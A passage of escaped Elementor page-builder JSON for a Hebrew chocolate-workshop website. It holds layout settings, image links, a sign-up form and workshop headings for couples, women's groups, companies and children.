vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":10,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/todd-quackenbush-700.png\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"50\"},\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 